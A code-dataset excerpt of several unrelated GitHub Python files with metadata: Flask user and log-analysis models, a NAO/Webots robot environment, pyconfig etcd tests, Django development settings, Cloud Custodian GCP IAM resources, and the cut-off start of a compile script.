text stringlengths 4 1.02M | meta dict |
|---|---|
from datetime import datetime
import hashlib
from werkzeug.security import generate_password_hash, check_password_hash
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from markdown import markdown
import bleach
from flask import current_app, request
from flask_login import UserMixin, AnonymousUserMixin
from . import db, login_manager
class Permission:
    # Bit flags OR-ed together into Role.permissions.  The Administrator
    # role is created with the full mask 0xff (see Role.insert_roles), so
    # ADMINISTER (0x80) is included in it implicitly.
    FOLLOW = 0x01
    COMMENT = 0x02
    WRITE_ARTICLES = 0x04
    MODERATE_COMMENTS = 0x08
    ADMINISTER = 0x80
class Role(db.Model):
    """A user role; ``permissions`` is a bitmask of Permission flags."""
    __tablename__ = 'roles'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(64), unique=True)
    default = db.Column(db.Boolean, default=False, index=True)
    permissions = db.Column(db.Integer)
    users = db.relationship('User', backref='role', lazy='dynamic')

    @staticmethod
    def insert_roles():
        """Create or refresh the built-in roles (safe to run repeatedly)."""
        roles = {
            'User': (Permission.FOLLOW |
                     Permission.COMMENT |
                     Permission.WRITE_ARTICLES, True),
            'Moderator': (Permission.FOLLOW |
                          Permission.COMMENT |
                          Permission.WRITE_ARTICLES |
                          Permission.MODERATE_COMMENTS, False),
            'Administrator': (0xff, False)
        }
        for role_name, (perms, is_default) in roles.items():
            role = Role.query.filter_by(name=role_name).first()
            if role is None:
                role = Role(name=role_name)
            role.permissions = perms
            role.default = is_default
            db.session.add(role)
        db.session.commit()

    def __repr__(self):
        return '<Role %r>' % self.name
class User(UserMixin, db.Model):
    """Registered account with profile data, a role-based permission mask
    and signed-token helpers for confirmation, password reset and email
    change."""
    __tablename__ = 'users'
    id = db.Column(db.Integer, primary_key=True)
    email = db.Column(db.String(64), unique=True, index=True)
    username = db.Column(db.String(64), unique=True, index=True)
    role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
    password_hash = db.Column(db.String(128))
    confirmed = db.Column(db.Boolean, default=False)
    name = db.Column(db.String(64))
    location = db.Column(db.String(64))
    about_me = db.Column(db.Text())
    member_since = db.Column(db.DateTime(), default=datetime.utcnow)
    last_seen = db.Column(db.DateTime(), default=datetime.utcnow)
    # Cached MD5 of the email; reused by gravatar() so the digest is not
    # recomputed on every request.
    avatar_hash = db.Column(db.String(32))
    posts = db.relationship('Post', backref='author', lazy='dynamic')
    keywords = db.relationship('Keyword', backref='author', lazy='dynamic')
    bugtypes = db.relationship('BugType', backref='author', lazy='dynamic')
    loganalyzers = db.relationship('LogAnalyzer', backref='author', lazy='dynamic')

    @staticmethod
    def generate_fake(count=100):
        """Insert up to `count` random users (development/test helper)."""
        from sqlalchemy.exc import IntegrityError
        from random import seed
        import forgery_py
        seed()
        for i in range(count):
            u = User(email=forgery_py.internet.email_address(),
                     username=forgery_py.internet.user_name(True),
                     password=forgery_py.lorem_ipsum.word(),
                     confirmed=True,
                     name=forgery_py.name.full_name(),
                     location=forgery_py.address.city(),
                     about_me=forgery_py.lorem_ipsum.sentence(),
                     member_since=forgery_py.date.date(True))
            db.session.add(u)
            try:
                db.session.commit()
            except IntegrityError:
                # Random email/username collided with an existing row; skip it.
                db.session.rollback()

    def __init__(self, **kwargs):
        """Assign a role on creation (administrator for the FLASKY_ADMIN
        email, otherwise the default role) and pre-compute the avatar hash."""
        super(User, self).__init__(**kwargs)
        if self.role is None:
            if self.email == current_app.config['FLASKY_ADMIN']:
                self.role = Role.query.filter_by(permissions=0xff).first()
            if self.role is None:
                self.role = Role.query.filter_by(default=True).first()
        if self.email is not None and self.avatar_hash is None:
            self.avatar_hash = hashlib.md5(
                self.email.encode('utf-8')).hexdigest()

    @property
    def password(self):
        """Write-only attribute: the plaintext password is never stored."""
        raise AttributeError('password is not a readable attribute')

    @password.setter
    def password(self, password):
        self.password_hash = generate_password_hash(password)

    def verify_password(self, password):
        """Return True if `password` matches the stored hash."""
        return check_password_hash(self.password_hash, password)

    def generate_confirmation_token(self, expiration=3600):
        """Return a signed account-confirmation token (default 1h expiry)."""
        s = Serializer(current_app.config['SECRET_KEY'], expiration)
        return s.dumps({'confirm': self.id})

    def confirm(self, token):
        """Mark the account confirmed if `token` is valid for this user."""
        s = Serializer(current_app.config['SECRET_KEY'])
        try:
            data = s.loads(token)
        except Exception:
            # Was a bare `except:` — narrowed so SystemExit/KeyboardInterrupt
            # are not swallowed.  Any bad/expired signature means failure.
            return False
        if data.get('confirm') != self.id:
            return False
        self.confirmed = True
        db.session.add(self)
        return True

    def generate_reset_token(self, expiration=3600):
        """Return a signed password-reset token (default 1h expiry)."""
        s = Serializer(current_app.config['SECRET_KEY'], expiration)
        return s.dumps({'reset': self.id})

    def reset_password(self, token, new_password):
        """Set `new_password` if `token` is a valid reset token for this user."""
        s = Serializer(current_app.config['SECRET_KEY'])
        try:
            data = s.loads(token)
        except Exception:  # was a bare except: invalid/expired signature
            return False
        if data.get('reset') != self.id:
            return False
        self.password = new_password
        db.session.add(self)
        return True

    def generate_email_change_token(self, new_email, expiration=3600):
        """Return a signed token authorizing a change to `new_email`."""
        s = Serializer(current_app.config['SECRET_KEY'], expiration)
        return s.dumps({'change_email': self.id, 'new_email': new_email})

    def change_email(self, token):
        """Apply the email change encoded in `token`; refuses duplicates."""
        s = Serializer(current_app.config['SECRET_KEY'])
        try:
            data = s.loads(token)
        except Exception:  # was a bare except: invalid/expired signature
            return False
        if data.get('change_email') != self.id:
            return False
        new_email = data.get('new_email')
        if new_email is None:
            return False
        if self.query.filter_by(email=new_email).first() is not None:
            return False
        self.email = new_email
        self.avatar_hash = hashlib.md5(
            self.email.encode('utf-8')).hexdigest()
        db.session.add(self)
        return True

    def can(self, permissions):
        """True if this user's role grants every bit in `permissions`."""
        return self.role is not None and \
            (self.role.permissions & permissions) == permissions

    def is_administrator(self):
        return self.can(Permission.ADMINISTER)

    def ping(self):
        """Refresh last_seen; called on every authenticated request."""
        self.last_seen = datetime.utcnow()
        db.session.add(self)

    # http://www.gravatar.com/avatar/63892853e2947e692c0ec0ec17d16864?s=256&d=identicon&r=g
    def gravatar(self, size=100, default='identicon', rating='g'):
        """Build the Gravatar URL for this user's email."""
        if request.is_secure:
            url = 'https://secure.gravatar.com/avatar'
        else:
            url = 'http://www.gravatar.com/avatar'
        # Renamed from `hash` to avoid shadowing the builtin.
        digest = self.avatar_hash or hashlib.md5(
            self.email.encode('utf-8')).hexdigest()
        return '{url}/{hash}?s={size}&d={default}&r={rating}'.format(
            url=url, hash=digest, size=size, default=default, rating=rating)

    def __repr__(self):
        return '<User %r>' % self.username
class AnonymousUser(AnonymousUserMixin):
    """Stand-in for unauthenticated visitors: no permissions at all.
    Lets views call current_user.can()/is_administrator() without first
    checking whether the user is logged in."""
    def can(self, permissions):
        return False

    def is_administrator(self):
        return False

# Flask-Login returns this class for requests with no logged-in user.
login_manager.anonymous_user = AnonymousUser
@login_manager.user_loader
def load_user(user_id):
    """Flask-Login callback: load a user by the (string) id from the session."""
    return User.query.get(int(user_id))
class Post(db.Model):
    """A blog post; body_html is regenerated whenever body changes."""
    __tablename__ = 'posts'
    id = db.Column(db.Integer, primary_key=True)
    body = db.Column(db.Text)
    body_html = db.Column(db.Text)
    timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
    author_id = db.Column(db.Integer, db.ForeignKey('users.id'))

    @staticmethod
    def generate_fake(count=100):
        """Insert `count` random posts attributed to random existing users."""
        from random import seed, randint
        import forgery_py
        seed()
        # Assumes at least one user row exists already.
        user_count = User.query.count()
        for _ in range(count):
            random_author = User.query.offset(randint(0, user_count - 1)).first()
            fake_post = Post(
                body=forgery_py.lorem_ipsum.sentences(randint(1, 5)),
                timestamp=forgery_py.date.date(True),
                author=random_author)
            db.session.add(fake_post)
            db.session.commit()

    @staticmethod
    def on_changed_body(target, value, oldvalue, initiator):
        """Render the Markdown body to sanitized, linkified HTML."""
        allowed_tags = ['a', 'abbr', 'acronym', 'b', 'blockquote', 'code',
                        'em', 'i', 'li', 'ol', 'pre', 'strong', 'ul',
                        'h1', 'h2', 'h3', 'p']
        sanitized = bleach.clean(markdown(value, output_format='html'),
                                 tags=allowed_tags, strip=True)
        target.body_html = bleach.linkify(sanitized)

# Re-render body_html every time Post.body is assigned.
db.event.listen(Post.body, 'set', Post.on_changed_body)
class Keyword(db.Model):
    """A log-matching keyword: a regex plus display/classification metadata."""
    __tablename__ = 'keywords'
    id = db.Column(db.Integer, primary_key=True)
    # The regular expression matched against log lines.
    kw_regex = db.Column(db.String(128), unique=True, index=True)
    description = db.Column(db.String(128))
    comment = db.Column(db.String(512))
    test_flag = db.Column(db.Boolean, default=False)
    color = db.Column(db.Integer)
    timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
    bugtype_id = db.Column(db.Integer, db.ForeignKey('bugtypes.id'))
    author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
class BugType(db.Model):
    """A bug category; groups Keyword rows via the bug_type backref."""
    __tablename__ = 'bugtypes'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(128))
    description = db.Column(db.Text)
    timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
    keywords = db.relationship('Keyword', backref='bug_type', lazy='dynamic')
    author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
class LogAnalyzer(db.Model):
    """One log-analysis job: where the log came from and its tracking ids."""
    __tablename__ = 'loganalyzers'
    id = db.Column(db.Integer, primary_key=True)
    # Source location the log archive is downloaded from.
    ftp_url = db.Column(db.String(140), unique=True, index=True)
    title = db.Column(db.String(128))
    description = db.Column(db.Text)
    timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
    bug_id = db.Column(db.Integer)
    moc_id = db.Column(db.Integer)
    task_id = db.Column(db.Integer)
    tv_model = db.Column(db.String(128))
    SN_id = db.Column(db.String(128))
    # Local directory the downloaded log is extracted to.
    log_dir = db.Column(db.String(128))
    # Whether the FTP download completed successfully.
    ftp_dl_ok = db.Column(db.Boolean, default=False)
    author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    bugtype_id = db.Column(db.Integer, db.ForeignKey('bugtypes.id'))
class Customer(db.Model):
    """A device/customer record: serial number and MAC addresses."""
    __tablename__ = 'customers'
    id = db.Column(db.Integer, primary_key=True)
    sn = db.Column(db.String(128))     # serial number
    emac = db.Column(db.String(128))   # ethernet MAC
    wmac = db.Column(db.String(128))   # wireless MAC
    bmac = db.Column(db.String(128))   # bluetooth MAC
    addr = db.Column(db.String(128))
    timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
| {
"content_hash": "2496faea389fc0e64725d33ad4a5fff2",
"timestamp": "",
"source": "github",
"line_count": 296,
"max_line_length": 91,
"avg_line_length": 36.486486486486484,
"alnum_prop": 0.6117592592592592,
"repo_name": "DonYum/LogAna",
"id": "456b2fa9073df33ff17c400cc7dc62f5f19ae4ec",
"size": "10800",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/models.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1190"
},
{
"name": "HTML",
"bytes": "34127"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "144162"
}
],
"symlink_target": ""
} |
from __future__ import division, print_function, absolute_import
import sys
import traceback
import time
import socket
from naoqi import ALProxy
from ..environments import Environment
__all__ = ['NaoEnvFactory', 'PhysicalWorld', 'Webots']
class NaoEnvFactory(object):
    """Factory producing NAO environment instances by type name.

    Notes
    -----
    Currently only soccer related events are handled by the Nao worlds. To
    be more specific the environment attempts to detect whether a goal was
    scored. The physical world will prompt the user to reset the experiment
    while the supervisor in the Webots world is responsible for resetting
    the environment for the next experiment.

    Examples
    --------
    >>> from mlpy.environments.nao import NaoEnvFactory
    >>> NaoEnvFactory.create('nao.physicalworld')

    This creates a :class:`.PhysicalWorld` instance controlling
    agents in the real world.

    >>> NaoEnvFactory.create('nao.webots', 12345)

    This creates a :class:`.Webots` instance controlling simulated
    agents in Webots. The port '12345' is the port the controller of
    the supervisor in the Webots world listens to.
    """

    @staticmethod
    def create(_type, *args, **kwargs):
        """Instantiate the Nao environment registered under `_type`.

        Parameters
        ----------
        _type : str
            Either ``nao.physicalworld`` (real robots, user-driven events;
            builds a :class:`PhysicalWorld`) or ``nao.webots`` (simulated
            robots driven by a supervisor controller such as
            `environments/webots/controllers/serverc`; builds a
            :class:`.Webots`).
        args : tuple, optional
            Positional arguments forwarded to the environment constructor.
        kwargs : dict, optional
            Keyword arguments forwarded to the environment constructor.

        Returns
        -------
        Environment
            The new environment, or None for an unknown `_type`.
        """
        factories = {
            "nao.physicalworld": PhysicalWorld,
            "nao.webots": Webots,
        }
        try:
            return factories[_type](*args, **kwargs)
        except KeyError:
            return None
class PhysicalWorld(Environment):
    """The physical (real) environment.

    Parameters
    ----------
    agents : Agent or list[Agent], optional
        A list of agents that act in the environment.

    Notes
    -----
    The agents act in the real world, so events (goal scored, experiment
    reset) are captured by prompting the user on the console.
    """

    def __init__(self, agents=None):
        super(PhysicalWorld, self).__init__(agents)

    def __str__(self):
        return "Physical World"

    def reset(self, t, **kwargs):
        """Reset the environment and all agents.

        Blocks until the user confirms the physical experiment was reset,
        then resets every agent.

        Parameters
        ----------
        t : float
            The current time (sec)
        kwargs : dict, optional
            Non-positional parameters, optional.
        """
        # Wait for the user; the entered text itself is irrelevant.
        raw_input("Please reset your experiment. Press ENTER to continue. >>>")
        super(PhysicalWorld, self).reset(t, **kwargs)

    # noinspection PyMethodMayBeStatic
    def check_data(self, value):
        """Request to check for data.

        The user supplies the answer on the console.

        Parameters
        ----------
        value : str
            The request identifier.

        Returns
        -------
        "success"/"fail" for the "check goal" request, otherwise None.
        """
        if value != "check goal":
            return
        answer = None
        while answer not in ["0", "1"]:
            answer = raw_input("Goal scored? [\"goal scored\": 1; \"goal missed\": 0] >>> ")
        return "success" if answer == "1" else "fail"
class Webots(Environment):
    """Simulated environment using the Webots simulator.

    The Webots environment works in conjunction with a controller
    specified for a supervisor. A sample controller can be found in
    `webots/controllers/serverc`. This controller listens on port
    `12345` for the following events:

    request reset
        Requests an environment reset from the controller.
    check goal
        Requests from the controller a check whether a goal
        was scored or not. The result of that check is send
        back to the client.

    Parameters
    ----------
    port : int, optional
        The port the controller listens to. If using the environment
        in conjunction with controller `serverc` the port number is
        `12345`. Default is 12345.
    agents : Agent or list[Agent], optional
        A list of agents that act in the environment.

    Notes
    -----
    When requested to reset, the environment will request to reset
    the simulated environment in Webots from the controller.
    It is also possible to check if a goal was scored by calling
    the function :meth:`check_data` with the argument 'check goal'.

    .. attention::
        Requires the `NAOqi <http://doc.aldebaran.com/2-1/index.html>`_
        API from Aldebaran be installed on your machine (separate license).
    """
    # Maximum number of bytes read per recv() call.
    RECV_BUFFER = 256

    def __init__(self, port=12345, agents=None):
        super(Webots, self).__init__(agents)
        # NAOqi proxies that must be reachable on every agent before the
        # connection is considered established (see _connect).
        self._modules = ["ALMemory",
                         "ALMotion",
                         "ALRobotPosture",
                         "ALVideoDevice"]
        self._port = port
        self._sock = None   # set in enter(), closed in exit()

    def __str__(self):
        return "Webots Pro version 8.0"

    def reset(self, t, **kwargs):
        """Reset the environment and all agents.

        Sends 'request reset' to the supervisor controller, waits for its
        'reset requested' acknowledgement, reconnects, then resets agents.

        Parameters
        ----------
        t : float
            The current time (sec)
        kwargs : dict, optional
            Non-positional parameters, optional.
        """
        if self._sock:
            self._sock.send("request reset")
            done = False
            while not done:
                try:
                    data = self._sock.recv(Webots.RECV_BUFFER)
                    self._log(data)
                    if data == "reset requested":
                        # Give the simulator time to restart before reconnecting.
                        time.sleep(5)
                        self._sock = self._connect()
                        done = True
                except socket.error:
                    # Non-blocking socket: nothing received yet, keep polling.
                    pass
        super(Webots, self).reset(t, **kwargs)

    def is_complete(self):
        """Checks if the environment has completed.

        This is dependent on whether the agent(s) have
        completed their task.

        Returns
        -------
        bool
            Whether the environment has reached some end goal.
        """
        is_complete = super(Webots, self).is_complete()
        # TODO: check for pending server requests
        return is_complete

    def enter(self, t):
        """Enter the environment and all agents.

        Opens the socket to the supervisor controller.

        Parameters
        ----------
        t : float
            The current time (sec).
        """
        self._sock = self._connect()
        super(Webots, self).enter(t)

    def exit(self):
        """Exit the environment and all agents.

        Closes the controller socket after the agents have exited.
        """
        super(Webots, self).exit()
        if self._sock:
            self._sock.close()

    def check_data(self, value):
        """Request to check for data.

        Parameters
        ----------
        value : str
            The request identifier (e.g. 'check goal').

        Returns
        -------
        The result returned by the controller.

        Notes
        -----
        Sends `value` to the supervisor controller and blocks (polling the
        non-blocking socket) until a reply arrives.
        """
        self._sock.send(value)
        while True:
            try:
                return self._sock.recv(Webots.RECV_BUFFER)
            except socket.error:
                # No reply yet; keep polling.
                pass

    def _connect(self):
        """Connect to the server (controller) and wait for NAOqi readiness.

        Retries the TCP connection until it succeeds, then blocks until an
        ALProxy can be created for every module on every agent. Exits the
        process if a socket cannot be created at all.
        """
        self._log("connecting...")
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        except socket.error:
            exc_type, exc_value, exc_traceback = sys.exc_info()
            traceback.print_exception(exc_type, exc_value, exc_traceback)
            sys.exit(1)
        host = socket.gethostname()
        connected = False
        while not connected:
            try:
                s.connect((host, self._port))
                s.setblocking(0)
                while True:
                    ready = True
                    for m in self._modules:
                        # noinspection PyBroadException
                        try:
                            for agent in self._agents.itervalues():
                                ALProxy(m, agent.pip, agent.pport)
                        except:
                            # Proxy creation failed: NAOqi not up yet.
                            ready = False
                            break
                    if ready:
                        break
                    time.sleep(1)
                connected = True
            except socket.error:
                # Controller not accepting connections yet; retry.
                pass
        self._log("connected")
        return s

    def _log(self, text):
        # Prefix every message with the environment name.
        print(str(self) + ": " + text)
| {
"content_hash": "85b3b0f8a9820f1786e05ae2d9c5cd12",
"timestamp": "",
"source": "github",
"line_count": 347,
"max_line_length": 100,
"avg_line_length": 29.7492795389049,
"alnum_prop": 0.5647583066937906,
"repo_name": "evenmarbles/mlpy",
"id": "a3c6378d56710f14eb1416102b909d34be29aaf5",
"size": "10323",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mlpy/environments/nao.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "23432"
},
{
"name": "C++",
"bytes": "128140"
},
{
"name": "Makefile",
"bytes": "1684"
},
{
"name": "Python",
"bytes": "663212"
}
],
"symlink_target": ""
} |
import os
import time
import pytool
from nose import SkipTest
from nose.tools import ok_, eq_
import pyconfig
def setup():
    """Seed the etcd test namespace; skip the whole module if etcd is unusable."""
    if not pyconfig.etcd().module:
        raise SkipTest("etcd not installed")
    if not pyconfig.etcd().configured:
        raise SkipTest("etcd not configured")
    pyconfig.set('pyconfig.etcd.prefix', '/pyconfig_test/test/')
    client = pyconfig.etcd().client
    # One key per JSON-encodable type, plus a second namespace that
    # inherits from the first via the special 'config.inherit' key.
    client.set('pyconfig_test/test/pyconfig.number', pytool.json.as_json(1))
    client.set('pyconfig_test/test/pyconfig.boolean', pytool.json.as_json(True))
    client.set('pyconfig_test/test/pyconfig.string', pytool.json.as_json("Value"))
    client.set('pyconfig_test/test/pyconfig.json', pytool.json.as_json({"a": "b"}))
    client.set('pyconfig_test/test2/pyconfig.number', pytool.json.as_json(2))
    client.set('pyconfig_test/test2/config.inherit',
               pytool.json.as_json('/pyconfig_test/test/'))
def teardown():
    """Delete every etcd directory written by these tests."""
    if not pyconfig.etcd().configured:
        return
    # Clean up the test namespaces
    for namespace in ('pyconfig_test/test',
                      'pyconfig_test/test2',
                      'pyconfig_test/watching',
                      'pyconfig_test/'):
        pyconfig.etcd().client.delete(namespace, dir=True, recursive=True)
def test_using_correct_prefix():
    """The prefix written in setup() is what etcd() reports."""
    eq_(pyconfig.etcd().prefix, '/pyconfig_test/test/')
def test_parse_hosts_single_host():
    """A single 'host:port' string parses to a one-element tuple."""
    host = pyconfig.etcd()._parse_hosts('127.0.0.1:2379')
    eq_(host, (('127.0.0.1', 2379),))
def test_parse_hosts_multiple_hosts():
    """A comma-separated host list parses to a tuple of (host, port) pairs."""
    hosts = '10.0.0.1:2379,10.0.0.2:2379,10.0.0.3:2379'
    hosts = pyconfig.etcd()._parse_hosts(hosts)
    eq_(hosts, (('10.0.0.1', 2379), ('10.0.0.2', 2379), ('10.0.0.3', 2379)))
def test_load_works():
    """load() round-trips all four value types written in setup()."""
    conf = pyconfig.etcd().load()
    eq_(conf.get('pyconfig.json'), {"a": "b"})
    eq_(conf.get('pyconfig.string'), 'Value')
    eq_(conf.get('pyconfig.boolean'), True)
    eq_(conf.get('pyconfig.number'), 1)
def test_changing_prefix_works():
    """Switching to an empty prefix loads nothing; then restore the prefix."""
    pyconfig.etcd(prefix='pyconfig/other')
    eq_(pyconfig.etcd().prefix, '/pyconfig/other/')
    conf = pyconfig.etcd().load()
    eq_(conf, {})
    # Restore the prefix used by the rest of the module.
    pyconfig.set('pyconfig.etcd.prefix', 'pyconfig_test/test')
    eq_(pyconfig.etcd().prefix, '/pyconfig_test/test/')
def test_inheritance_works():
    """test2 inherits test's keys; its own pyconfig.number wins (2 vs 1)."""
    pyconfig.set('pyconfig.etcd.prefix', 'pyconfig_test/test2')
    conf = pyconfig.etcd().load()
    eq_(conf.get('pyconfig.json'), {"a": "b"})
    eq_(conf.get('pyconfig.string'), 'Value')
    eq_(conf.get('pyconfig.boolean'), True)
    eq_(conf.get('pyconfig.number'), 2)
    eq_(conf.get('config.inherit'), '/pyconfig_test/test/')
    # Restore the prefix used by the rest of the module.
    pyconfig.set('pyconfig.etcd.prefix', 'pyconfig_test/test')
def test_reload_work_with_inheritance():
    """reload() must not raise when the active prefix uses inheritance."""
    pyconfig.set('pyconfig.etcd.prefix', 'pyconfig_test/test2')
    pyconfig.reload()
def test_autoloading_etcd_config_works():
    """After a clear + reload, inherited and own values are both available."""
    pyconfig.Config().clear()
    pyconfig.set('pyconfig.etcd.prefix', 'pyconfig_test/test2')
    pyconfig.reload()
    eq_(pyconfig.get('pyconfig.string'), 'Value')
    eq_(pyconfig.get('pyconfig.number'), 2)
def test_watching():
    """A value written directly to etcd shows up via the watcher thread."""
    # Enable watching
    os.environ['PYCONFIG_ETCD_WATCH'] = 'true'
    pyconfig.Config().clear()
    pyconfig.set('pyconfig.etcd.prefix', 'pyconfig_test/watching')
    pyconfig.reload()
    # Wait for 20ms before writing to ensure the watcher thread is ready
    time.sleep(0.020)
    # Write a new value directly to etcd
    pyconfig.etcd().client.write('pyconfig_test/watching/it.works',
                                 pytool.json.as_json(True))
    # Poll for the value; sloppy, but there is no event to block on.
    for _ in range(50):
        if pyconfig.get('it.works', None) is not None:
            break
        # Wait 20ms more for it to show up
        time.sleep(0.020)
    eq_(pyconfig.get('it.works', False), True)
# TODO:
# - Add tests for protocol environment variable
def test_protocol_is_picked_up_and_used():
    """Placeholder: protocol env var handling is not yet covered."""
    raise SkipTest("TODO")
# - Add tests for auth environment variable
def test_auth_is_picked_up_and_used():
    """Placeholder: auth env var handling is not yet covered."""
    raise SkipTest("TODO")
| {
"content_hash": "0cda3984d95c19b2b2a835276fea1f42",
"timestamp": "",
"source": "github",
"line_count": 132,
"max_line_length": 85,
"avg_line_length": 31.636363636363637,
"alnum_prop": 0.6592432950191571,
"repo_name": "shakefu/pyconfig",
"id": "1b8e97433cb4bf0afdaba6add177560c2bac94f2",
"size": "4176",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_etcd.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "49077"
}
],
"symlink_target": ""
} |
'''
Local settings

- Run in Debug mode
- Use console backend for emails
- Add Django Debug Toolbar
- Add django-extensions as app
'''

from .common import *  # noqa

# DEBUG
# ------------------------------------------------------------------------------
DEBUG = env.bool('DJANGO_DEBUG', default=True)
TEMPLATES[0]['OPTIONS']['debug'] = DEBUG

# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = env("DJANGO_SECRET_KEY", default='#18+!)v+luhb)3ds8mnbxdg0a=#mam#azum8db5#ub)3c_p9rw')

# CACHING
# ------------------------------------------------------------------------------
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        'LOCATION': ''
    },
    # Separate file-based cache used by django-file-resubmit.
    "file_resubmit": {
        'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
        "LOCATION": '/tmp/file_resubmit/'
    },
}

# django-debug-toolbar
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar', )

# 10.0.2.2 is the host machine as seen from a VirtualBox/Vagrant guest.
INTERNAL_IPS = ('127.0.0.1', '10.0.2.2',)

DEBUG_TOOLBAR_CONFIG = {
    'DISABLE_PANELS': [
        'debug_toolbar.panels.redirects.RedirectsPanel',
    ],
    'SHOW_TEMPLATE_CONTEXT': True,
}

# django-extensions
# ------------------------------------------------------------------------------
INSTALLED_APPS += ('django_extensions', 'wagtail.contrib.styleguide',)

# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'

EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'

WAGTAILSEARCH_BACKENDS = {
    'default': {
        'BACKEND': 'wagtail.search.backends.db',
    }
}
"content_hash": "52110936c0f1a4d658d1b86de764fe0e",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 99,
"avg_line_length": 30.234375,
"alnum_prop": 0.5074935400516796,
"repo_name": "bruecksen/isimip",
"id": "689251e52e8b68b139aeb165ea37551fa23b0e9a",
"size": "1959",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "config/settings/development.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "36731"
},
{
"name": "HTML",
"bytes": "106877"
},
{
"name": "JavaScript",
"bytes": "30564"
},
{
"name": "Python",
"bytes": "4244200"
},
{
"name": "Shell",
"bytes": "789"
}
],
"symlink_target": ""
} |
from c7n_gcp.provider import resources
from c7n_gcp.query import QueryResourceManager, TypeInfo
@resources.register('project-role')
class ProjectRole(QueryResourceManager):
    """GCP Project Role

    https://cloud.google.com/iam/docs/reference/rest/v1/organizations.roles#Role
    """
    class resource_type(TypeInfo):
        service = 'iam'
        version = 'v1'
        component = 'projects.roles'
        enum_spec = ('list', 'roles[]', None)
        scope = 'project'
        scope_key = 'parent'
        scope_template = 'projects/{}'
        name = id = "name"
        default_report_fields = ['name', 'title', 'description', 'stage', 'deleted']
        asset_type = "iam.googleapis.com/Role"

    @staticmethod
    def get(client, resource_info):
        # Fetch a single role; only the last path segment of role_name is
        # used, so both full paths and bare role ids are accepted.
        return client.execute_query(
            'get', verb_arguments={
                'name': 'projects/{}/roles/{}'.format(
                    resource_info['project_id'],
                    resource_info['role_name'].rsplit('/', 1)[-1])})
@resources.register('service-account')
class ServiceAccount(QueryResourceManager):
    """GCP IAM service accounts within a project."""

    class resource_type(TypeInfo):
        service = 'iam'
        version = 'v1'
        component = 'projects.serviceAccounts'
        enum_spec = ('list', 'accounts[]', [])
        scope = 'project'
        scope_key = 'name'
        scope_template = 'projects/{}'
        id = "name"
        name = 'email'
        default_report_fields = ['name', 'displayName', 'email', 'description', 'disabled']
        asset_type = "iam.googleapis.com/ServiceAccount"

    @staticmethod
    def get(client, resource_info):
        # Fetch a single service account addressed by its email id.
        return client.execute_query(
            'get', verb_arguments={
                'name': 'projects/{}/serviceAccounts/{}'.format(
                    resource_info['project_id'],
                    resource_info['email_id'])})
@resources.register('iam-role')
class Role(QueryResourceManager):
    """GCP Organization Role

    Predefined/curated roles, listed globally (contrast with ProjectRole).
    https://cloud.google.com/iam/docs/reference/rest/v1/organizations.roles#Role
    """
    class resource_type(TypeInfo):
        service = 'iam'
        version = 'v1'
        component = 'roles'
        enum_spec = ('list', 'roles[]', None)
        scope = "global"
        name = id = "name"
        default_report_fields = ['name', 'title', 'description', 'stage', 'deleted']
        asset_type = "iam.googleapis.com/Role"

    @staticmethod
    def get(client, resource_info):
        # Fetch a single global role by short name.
        return client.execute_command(
            'get', {
                'name': 'roles/{}'.format(
                    resource_info['name'])})
| {
"content_hash": "611b4e6ad255ec9704011cbc2e087d3c",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 91,
"avg_line_length": 34.9078947368421,
"alnum_prop": 0.5571051639653223,
"repo_name": "capitalone/cloud-custodian",
"id": "c990dd2aa256ad6e8baaae48cafbefee57cb3c96",
"size": "2781",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tools/c7n_gcp/c7n_gcp/resources/iam.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2190"
},
{
"name": "Go",
"bytes": "135995"
},
{
"name": "HTML",
"bytes": "31"
},
{
"name": "Makefile",
"bytes": "9378"
},
{
"name": "Python",
"bytes": "3693572"
},
{
"name": "Shell",
"bytes": "2294"
}
],
"symlink_target": ""
} |
import argparse
import json
import logging
import os
# Plain "[LEVEL] message" console logging for this script.
logging_format = '[%(levelname)s] %(message)s'
logging.basicConfig(level=logging.INFO, format=logging_format)

SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
# Repository root: two directories above this script.
REPO_ROOT_DIR = os.path.realpath(os.path.join(SCRIPT_DIR, "../.."))
def get_files_to_compile(json_data):
    """Return the source paths to compile from compile-commands JSON data.

    json_data is a list of dicts with a "file" key. Test, benchmark,
